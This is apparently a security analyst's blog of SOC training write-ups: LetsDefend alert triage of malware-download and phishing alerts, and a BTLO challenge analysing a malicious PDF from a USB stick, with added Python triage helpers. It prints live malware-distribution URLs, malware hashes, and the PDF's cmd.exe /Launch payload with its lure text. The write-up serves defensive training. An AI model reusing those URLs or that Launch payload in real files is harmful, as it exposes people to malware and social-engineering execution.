4ensiX

I noticed that for the alerts I called FP, I had selected FP, but the display shows TP.

LetsDefend level 1 alert SOC102 - Proxy - Suspicious URL Detected event-id 26

Details

EventID: 26
Event Time: Oct. 29, 2020, 7:05 p.m.
Rule: SOC102 - Proxy - Suspicious URL Detected
Level: Security Analyst
Source Address: 172.16.17.47
Source Hostname: BillPRD
Destination Address: 217.8.117.77
Destination Hostname: jamesrlongacre.ac.ug
Username: Bill
Request URL: http[:]//jamesrlongacre.ac[.]ug/ac.exe
User Agent: Firewall Test - Dont Block
Device Action: Blocked

playbook

Analyze URL Address

First, investigate starting from the IP.

217.8.117.77

VirusTotal 5/90: https://www.virustotal.com/gui/ip-address/217.8.117.7
URLhaus: https://urlhaus.abuse.ch/browse.php?search=217.8.117.77
ip-sc: https://ip-sc.net/ja/r/217.8.117.77
VT does not have many detections, but URLhaus reports associations with various malware such as AsyncRAT, ArkeiStealer, AZORult and RaccoonStealer, so it is reasonable to judge the IP malicious.
ip-sc rates the threat level as low; it is a Russian IP.

http[:]//jamesrlongacre.ac[.]ug/ac.exe

VirusTotal 10/93: https://www.virustotal.com/gui/url/3114ff42180d969ca55e5b84e12ec4119bf402e520f5ad4f27eec137d1a8ec4f
URLhaus: https://urlhaus.abuse.ch/url/748266/
Searching for the URL on VT, the number of detections increases, and I also confirmed it on URLhaus. It appears to be an AsyncRAT download.
AsyncRAT (Malware Family)
According to the VT report, the downloaded file has been distributed from the same IP many times.
VirusTotal: ac.exe

User Agent: Firewall Test - Dont Block <- ????

At this point, it is safe to say that the URL blocked here is malicious.
What bothers me, though, is the User Agent. It could conceivably have been used for work that was part of a security test, but the destination is clearly suspicious.
Also, 29 minutes later, the alert analyzed in the following post was detected from this host.
LetsDefend level 1 alert SOC105 - Requested T.I. URL address event-id 28 - 4ensiX
I cannot tell how the later alert is related, but this looks like an attack disguised as a test.


Answer: Malicious

Has Anyone Accessed IP/URL/Domain?

Device Action Blocked

I also checked the logs; the request was blocked.

DATE TYPE SOURCE ADDRESS SOURCE PORT DESTINATION ADDRESS DESTINATION PORT
Oct, 29, 2020, 07:05 PM Proxy 172.16.17.47 39485 217.8.117.77 443
Request URL: http://jamesrlongacre.ac.ug/ac.exe
Request Method: GET
Device Action: Blocked
Process: chrome.exe
Parent Process: explorer.exe
Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e

Answer: Not Accessed

Add Artifacts

Value Type Comment
http[:]//jamesrlongacre.ac[.]ug/ac.exe URL Address AsyncRAT distribution server (217.8.117.77)
217.8.117.77 IP Address Multiple malware distribution server

True Positive

End

close alert event-id 26

LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 27

Details

EventID: 27
Event Time: Oct. 29, 2020, 7:25 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address: 146.56.209.252
Source Address: ndt@zol.co.zw
Destination Address: susie@letsdefend.io
E-mail Subject: UPS Your Packages Status Has Changed
Device Action: Blocked

playbook

Are there attachments or URLs in the email?

Answer: Yes

Analyze Url/Attachment

Sender IP 146.56.209.252

VirusTotal: https://www.virustotal.com/gui/ip-address/146.56.209.252/detection
AbuseIPDB: https://www.abuseipdb.com/check/146.56.209.252
ip-sc: https://ip-sc.net/ja/r/146.56.209.252

The IP is from China, Shenzhen Tencent. It is used as a source of SSH brute-force attacks.

Sender Domain zol.co[.]zw

Hybrid-Analysis: https://www.hybrid-analysis.com/search?query=zol.co.zw
It is a suspicious domain.

Mail

UPS Your Packages Status Has Changed

From: ndt@zol.co.zw Oct. 29, 2020, 7:25 p.m.
To: susie@letsdefend.io Oct. 29, 2020, 7:25 p.m.
You have received a secure message from a Veterans United Employee.

Click below link by 2020-11-14 14:30 CDT to read your message. After that, open attachment.

https://hredoybangladesh.com/content/docs/wvoiha4vd1aqty/

VirusTotal: https://www.virustotal.com/gui/url/2825a389272fd0e4b9923c98644a1786d4019ec7002c0a718b59dbe6d713a889
URLhaus: https://urlhaus.abuse.ch/url/698975/
The page can no longer be viewed, so I cannot check it directly, but the VT report says it is a malware download URL, and URLhaus reports it is related to Emotet / Heodo.
The most recent file URLhaus associates with the reported link is:
VirusTotal: https://www.virustotal.com/gui/file/360a5cb7eed923017b4ef07460e7652362cdf1fc0a902516addbb8e244e30134/detection/f-360a5cb
Searching ANYRUN for the same hash as this file:
ANYRUN: https://app.any.run/tasks/989ac1f3-9d9e-4854-80c1-f65b1b8cd1a2/
A macro runs PowerShell, executes the downloaded payload, and then communicates with the C2 server, sets up autorun, and so on.

hredoybangladesh[.]com

The domain is also flagged by several vendors.
VirusTotal: https://www.virustotal.com/gui/domain/hredoybangladesh.com/detection


Answer: Malicious

Check If Mail Delivered to User?

Device Action Blocked

Answer: Not Delivered

Add Artifacts

Value Type Comment
ndt@zol.co.zw E-mail Sender 146.56.209.252
https[:]//hredoybangladesh[.]com/content/docs/wvoiha4vd1aqty/ URL Address download link (Emotet, Heodo)

End

close alert event-id 27

LetsDefend level 1 alert SOC105 - Requested T.I. URL address event-id 28

Details

EventID: 28
Event Time: Oct. 29, 2020, 7:34 p.m.
Rule: SOC105 - Requested T.I. URL address
Level: Security Analyst
Source Address: 172.16.17.47
Source Hostname: BillPRD
Destination Address: 115.99.150.132
Username: Bill
Request URL: http[:]//115.99.150.132:56841/Mozi.m
User Agent: Firewall Test - Dont Block
Device Action: Blocked

playbook

Analyze Threat Intel Data

http[:]//115.99.150.132:56841/Mozi.m

VirusTotal: https://www.virustotal.com/gui/url/95f3eda1ff810022df76400ab1d5f2e4ac44817f116678132486fc92ec6aab46
URLhaus: https://urlhaus.abuse.ch/url/748225/
On VT, well-known vendors rate it malicious, so the URL is suspicious.
Since it is listed on URLhaus, the URL is definitely malware related.

Download file Mozi.m

Answer: Malicious

Interaction with TI data

DATE TYPE SOURCE ADDRESS SOURCE PORT DESTINATION ADDRESS DESTINATION PORT
Oct, 29, 2020, 07:34 PM Proxy 172.16.17.47 46938 115.99.150.132 56841
Request URL: http://115.99.150.132:56841/Mozi.m
Request Method: GET
Device Action: Blocked
Process: chrome.exe
Parent Process: explorer.exe
Parent Process MD5: 8b88ebbb05a0e56b7dcc708498c02b3e

The access was blocked. No clues were found on the endpoint.

Answer: Not Accessed

Add Artifacts

Value Type Comment
http[:]//115.99.150.132:56841/Mozi.m URL Address malware download
a73ddd6ec22462db955439f665cad4e6 MD5 Hash Mozi.m - elf malware?

End

close alert event-id 28
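The "Has anyone accessed it?" step of the two proxy alerts (event-ids 26 and 28), as an added Python example that is not part of the original write-up: it parses records laid out like the proxy log quoted above, matches them against the artifacts collected, flags the "Firewall Test - Dont Block" user agent that stood out, and answers Accessed / Not Accessed from the Device Action. The log records are constructed; the User Agent line is taken from the alert details since the quoted log itself does not carry it.

```python
import re
from urllib.parse import urlsplit

# Constructed records in the write-up's proxy log layout, plus a User Agent line
# taken from the alert details (the log itself does not carry it).
SAMPLE_LOG = """\
Oct, 29, 2020, 07:05 PM Proxy 172.16.17.47 39485 217.8.117.77 443
Request URL: http://jamesrlongacre.ac.ug/ac.exe
Device Action: Blocked
User Agent: Firewall Test - Dont Block

Oct, 29, 2020, 07:34 PM Proxy 172.16.17.47 46938 115.99.150.132 56841
Request URL: http://115.99.150.132:56841/Mozi.m
Device Action: Blocked
User Agent: Firewall Test - Dont Block
"""
IOCS = {"217.8.117.77", "jamesrlongacre.ac.ug", "115.99.150.132"}  # artifacts from the alerts
SUSPECT_UA = "Firewall Test - Dont Block"  # the user agent that stood out in both alerts
HEAD_RE = re.compile(r"^(.+?[AP]M)\s+(\S+)\s+(\S+)\s+(\d+)\s+(\S+)\s+(\d+)$")

def parse_records(text):
    """Split the log into records: header fields plus the 'Key: Value' lines below each."""
    records = []
    for block in text.strip().split("\n\n"):
        lines = block.splitlines()
        m = HEAD_RE.match(lines[0])
        if not m:
            continue  # not a proxy header line
        rec = dict(zip(("date", "type", "src", "sport", "dst", "dport"), m.groups()))
        for line in lines[1:]:
            key, _, value = line.partition(": ")
            rec[key] = value
        records.append(rec)
    return records

def triage(records):
    """(src, url, ioc_hit, accessed, test_ua) for each record hitting an IOC or the odd UA."""
    findings = []
    for r in records:
        host = urlsplit(r.get("Request URL", "")).hostname or ""
        ioc_hit = r["dst"] in IOCS or host in IOCS
        test_ua = r.get("User Agent") == SUSPECT_UA
        if ioc_hit or test_ua:
            findings.append((r["src"], r.get("Request URL", ""), ioc_hit,
                             r.get("Device Action") != "Blocked", test_ua))
    return findings

def was_accessed(records):  # playbook question: did any IOC request get past the proxy?
    return any(acc for _, _, hit, acc, _ in triage(records) if hit)
```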

Old alerts are not very interesting.

LetsDefend level 1 alert SOC101 - Phishing Mail Detected event-id 29

Details

EventID: 29
Event Time: Oct. 29, 2020, 7:43 p.m.
Rule: SOC101 - Phishing Mail Detected
Level: Security Analyst
SMTP Address: 191.233.193.73
Source Address: icianb@hotmail.com
Destination Address: sofia@letsdefend.io
E-mail Subject: Invoice
Device Action: Blocked

playbook

Are there attachments or URLs in the email?

Mail

Invoice

From: icianb@hotmail.com Oct. 29, 2020, 7:43 p.m.
To: sofia@letsdefend.io Oct. 29, 2020, 7:43 p.m.

Hello,

Attached copy of your unpaid invoice & Statement Our Statement shows 2 invoices are paid. Our AP did confirmed payment was paid on the 13th of October into your Bank account.

Thank you.

Attachments:
4abd5dd8377e5810116f3665bd8d92f0.zip

Answer: Yes

Analyze Url/Attachment

The sender is hotmail, so nothing can be said about it. This time the problem seems to be the attachment.

$ sha256sum 43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa.exe 
43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa  43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa.exe

VirusTotal 35/68: https://www.virustotal.com/gui/file/43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa/detection
Hybrid-Analysis: https://www.hybrid-analysis.com/sample/43fb4c1abaa3a8d79300fcc9eb12214a0b821ffe32f6389cd5e45ba5360e06aa/5f9d102805f963128371eff5
For now, there is no problem calling it malicious. Performing network device lookups is also suspicious. VT has a report that it is an APT scanner.

Answer: Malicious

Check If Mail Delivered to User?

Device Action Blocked

Answer: Not Delivered

Add Artifacts

Value Type Comment
icianb@hotmail.com E-mail Sender 191.233.193.73
4abd5dd8377e5810116f3665bd8d92f0 MD5 Hash APT Scanner? Malicious by VT

End

close alert event-id 29

BTLO Challenge Suspicious USB Stick(Retired Challenge) write up

BTLO Challenge Suspicious USB Stick(Retired Challenge)

Scenario

One of our clients informed us they recently suffered an employee data breach. As a startup company, they had a constrained budget allocated for security and employee training. I visited them and spoke with the relevant stakeholders. I also collected some suspicious emails and a USB drive an employee found on their premises. While I am analyzing the suspicious emails, can you check the contents on the USB drive?

Reading Material:
https://zeltser.com/analyzing-malicious-documents/
https://en.wikipedia.org/wiki/List_of_file_signatures
https://eternal-todo.com/tools/peepdf-pdf-analysis-tool.

Challenge Submission

1. What file is the autorun.inf running? (3 points)

Format: filename.extension

$ cat autorun.inf 
[autorun]
open=README.pdf
icon=autorun.ico

Answer: README.pdf

2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)

True or False

SHA256: c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43 https://www.virustotal.com/gui/file/c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43

38/59

Answer: False

3. Does the file have the correct magic number? (2 points)

True or False

$ file README.pdf 
README.pdf: PDF document, version 1.7
$ hexdump -C README.pdf | head
00000000  25 50 44 46 2d 31 2e 37  0d 0a 25 b5 b5 b5 b5 0d  |%PDF-1.7..%.....|
00000010  0a 31 20 30 20 6f 62 6a  0d 0a 3c 3c 2f 54 79 70  |.1 0 obj..<</Typ|
00000020  65 2f 43 61 74 61 6c 6f  67 2f 50 61 67 65 73 20  |e/Catalog/Pages |
00000030  32 20 30 20 52 2f 4c 61  6e 67 28 65 6e 2d 55 53  |2 0 R/Lang(en-US|
00000040  29 20 2f 53 74 72 75 63  74 54 72 65 65 52 6f 6f  |) /StructTreeRoo|
00000050  74 20 31 30 20 30 20 52  2f 4d 61 72 6b 49 6e 66  |t 10 0 R/MarkInf|
00000060  6f 3c 3c 2f 4d 61 72 6b  65 64 20 74 72 75 65 3e  |o<</Marked true>|
00000070  3e 2f 4d 65 74 61 64 61  74 61 20 32 30 20 30 20  |>/Metadata 20 0 |
00000080  52 2f 56 69 65 77 65 72  50 72 65 66 65 72 65 6e  |R/ViewerPreferen|
00000090  63 65 73 20 32 31 20 30  20 52 3e 3e 0d 0a 65 6e  |ces 21 0 R>>..en|

Answer: True

4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)

Operating System

$ pdfinfo  README.pdf 
Creator:        StarMan
CreationDate:   Thu Feb 11 02:54:49 2021 EST
ModDate:        Thu Feb 11 02:54:49 2021 EST
Tagged:         yes
UserProperties: no
Suspects:       no
Form:           none
Syntax Warning: Bad launch-type link action
JavaScript:     no
Pages:          1
Encrypted:      no
Page size:      612 x 792 pts (letter)
Page rot:       0
File size:      136561 bytes
Optimized:      no
PDF version:    1.7
$ pdfid  README.pdf 
PDFiD 0.2.7 README.pdf
 PDF Header: %PDF-1.7
 obj                   25
 endobj                25
 stream                 7
 endstream              7
 xref                   4
 trailer                4
 startxref              4
 /Page                  2
 /Encrypt               0
 /ObjStm                1
 /JS                    1
 /JavaScript            1
 /AA                    1
 /OpenAction            1
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                1
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0
$ pdf-parser -a README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
Comment: 8
XREF: 4
Trailer: 4
StartXref: 4
Indirect object: 24
  8: 4, 9, 18, 19, 21, 24, 26, 9
 /Action 2: 27, 28
 /Catalog 2: 1, 1
 /ExtGState 2: 7, 8
 /Filespec 1: 25
 /Font 1: 5
 /FontDescriptor 1: 6
 /Metadata 2: 20, 20
 /ObjStm 1: 17
 /Page 2: 3, 3
 /Pages 1: 2
 /XRef 1: 22
Search keywords:
 /JS 1: 27
 /JavaScript 1: 27
 /AA 1: 3
 /OpenAction 1: 1
 /Launch 1: 28
# check /JS, /JavaScript, /OpenAction and /Launch
$ pdf-parser -o 27 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 27 0
 Type: /Action
 Referencing: 

  <<
    /S /JavaScript
    /JS (this.exportDataObject({ cName: "README", nLaunch: 0 });)
    /Type /Action
  >>
$ pdf-parser -o 1 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 10 0 R, 20 0 R, 21 0 R

  <<
    /Type /Catalog
    /Pages 2 0 R
    /Lang (en-US)
    /StructTreeRoot 10 0 R
    /MarkInfo
      <<
        /Marked true
      >>
    /Metadata 20 0 R
    /ViewerPreferences 21 0 R
  >>


obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 23 0 R, 27 0 R, 10 0 R, 20 0 R, 21 0 R

  <<
    /Type /Catalog
    /Pages 2 0 R
    /Names 23 0 R
    /OpenAction 27 0 R
    /Lang (en-US)
    /StructTreeRoot 10 0 R
    /MarkInfo
      <<
        /Marked true
      >>
    /Metadata 20 0 R
    /ViewerPreferences 21 0 R
  >>
$ pdf-parser -o 28 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 28 0
 Type: /Action
 Referencing: 

  <<
    /S /Launch
    /Type /Action
    /Win
      <<
        /F (cmd.exe)
        /D '(c:\\\\windows\\\\system32)'
        /P '(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\\\README.pdf" (cd "Desktop"))&(if exist "My Documents\\\\README.pdf" (cd "My Documents"))&(if exist "Documents\\\\README.pdf" (cd "Documents"))&(if exist "Escritorio\\\\README.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\\\\README.pdf" (cd "Mis Documentos"))&(start README.pdf)\n\n\n\n\n\n\n\n\n\nTo view the encrypted content please tick the "Do not show this message again" box and press Open.)'
      >>
  >>

Answer: windows

5. A Windows executable is mentioned in the pdf file, what is it? (3 points)

Format: filename.exe
From the output of $ pdf-parser -o 28 README.pdf,
Answer: cmd.exe

6. How many suspicious /OpenAction elements does the file have? (5 points)

From the output of $ pdfid README.pdf, and the /OpenAction 27 in obj 1, there is one suspicious JavaScript execution.
Answer: 1
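The checks behind questions 3 to 6, as an added Python example that is not part of the original write-up: the sample PDF is a constructed skeleton of README.pdf (not the real file) with obj 1 defined twice, the way pdf-parser showed it, because the incremental update added /OpenAction. The scanner verifies the %PDF- magic, counts the same keywords pdfid reports, resolves the /OpenAction reference to its action object while honouring the later definition of obj 1, and reads the executable named by the /Launch action.

```python
import re

# Constructed minimal PDF mirroring what pdf-parser showed for README.pdf: the catalog
# (obj 1) is defined twice because an incremental update added /OpenAction, obj 27 is a
# JavaScript action and obj 28 a /Launch action. Not the real sample, just its skeleton.
SAMPLE_PDF = (
    b"%PDF-1.7\r\n"
    b"1 0 obj\r\n<</Type /Catalog /Pages 2 0 R>>\r\nendobj\r\n"
    b"27 0 obj\r\n<</S /JavaScript /JS (this.exportDataObject({ cName: \"README\", nLaunch: 0 });)"
    b" /Type /Action>>\r\nendobj\r\n"
    b"28 0 obj\r\n<</S /Launch /Type /Action /Win <</F (cmd.exe)>>>>\r\nendobj\r\n"
    b"1 0 obj\r\n<</Type /Catalog /Pages 2 0 R /Names 23 0 R /OpenAction 27 0 R>>\r\nendobj\r\n"
    b"%%EOF\r\n"
)
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\s*(.*?)\s*endobj", re.S)
KEYWORDS = [b"/JS", b"/JavaScript", b"/AA", b"/OpenAction", b"/Launch", b"/EmbeddedFile"]

def has_pdf_magic(data):
    """Question 3: the file signature must be '%PDF-' at offset 0."""
    return data[:5] == b"%PDF-"

def count_keywords(data):
    """pdfid-style counts; the lookahead stops a keyword matching as a prefix of a longer name."""
    return {k.decode(): len(re.findall(re.escape(k) + rb"(?![A-Za-z])", data)) for k in KEYWORDS}

def parse_objects(data):
    """Object number -> body; a later definition (incremental update) replaces an earlier one,
    which is why the second copy of obj 1 is the one a viewer actually honours."""
    objs = {}
    for num, _gen, body in OBJ_RE.findall(data):
        objs[int(num)] = body
    return objs

def open_actions(data):
    """Resolve every /OpenAction reference to its target object and report the action type."""
    objs = parse_objects(data)
    findings = []
    for num, body in objs.items():
        ref = re.search(rb"/OpenAction\s+(\d+)\s+\d+\s+R", body)
        if ref:
            target = int(ref.group(1))
            kind = re.search(rb"/S\s*/(\w+)", objs.get(target, b""))
            findings.append((num, target, kind.group(1).decode() if kind else "unknown"))
    return findings

def launch_targets(data):
    """Executables named by /Win /F inside any /Launch action (question 5)."""
    return [f.decode() for f in re.findall(rb"/S\s*/Launch.*?/F\s*\((.*?)\)", data, re.S)]
```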